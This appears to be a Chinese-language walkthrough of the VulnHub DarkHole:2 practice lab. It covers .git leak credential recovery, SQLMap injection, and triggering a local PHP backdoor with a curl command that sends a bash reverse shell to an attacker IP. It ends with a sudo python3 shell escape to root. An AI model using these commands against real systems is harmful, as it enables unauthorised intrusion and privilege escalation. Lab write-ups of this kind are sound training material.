DarkHole:2
项目地址:https://download.vulnhub.com/darkhole/darkhole_2.zip
是一个打包好的镜像文件
注意:导入 ova 时一定要选择我已移动,否则没网
使用 Nmap 扫描出开放服务及操作系统版本

敏感信息泄露
.git 泄露
扫描出存在 /.git/ 目录,使用 Git Dumper 下载下来
1 | git clone https://github.com/internetwache/GitTools.git |

查看日志可以看到最新的修改记录是针对于 login.php

运行 git diff a4d900a8d85e8938d3601f3cef113ee293028e10 查看刚开始添加的 login.php
在里面翻找到初始的用户名密码

弱口令
login
来到登录页面登录
1 | lush@admin.com:321 |

SSH
通过下面的 SQL 注入拿到的数据登录成功

SQL 注入
id
登陆后网页存在 id 参数

使用 SQLMap 梭哈,一定要带上 Cookie——--cookie=PHPSESSID="glqe49ducs05i7g03gcq8m5u0i"

有个 ssh 表,里面有用户名密码

可以登录 SSH,截图在上面弱口令那一章
提权
定时任务
通过 pspy64 看到运行了一个 PHP 在本地 9999 端口,且给了路径

看了一眼是 PHP 后门

传入反弹 Shell
1 | curl -v "http://127.0.0.1:9999/?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.110.150%2F8888%200%3E%261%27" |
成功反弹

查看历史命令找到密码,是 gang

SSH 登录上

/etc/sudoers 配置不当
检查自身权限发现可以使用 Python3

Python3 提权
提权成功
1 | sudo python3 -c 'import os;os.system("/bin/sh")' |
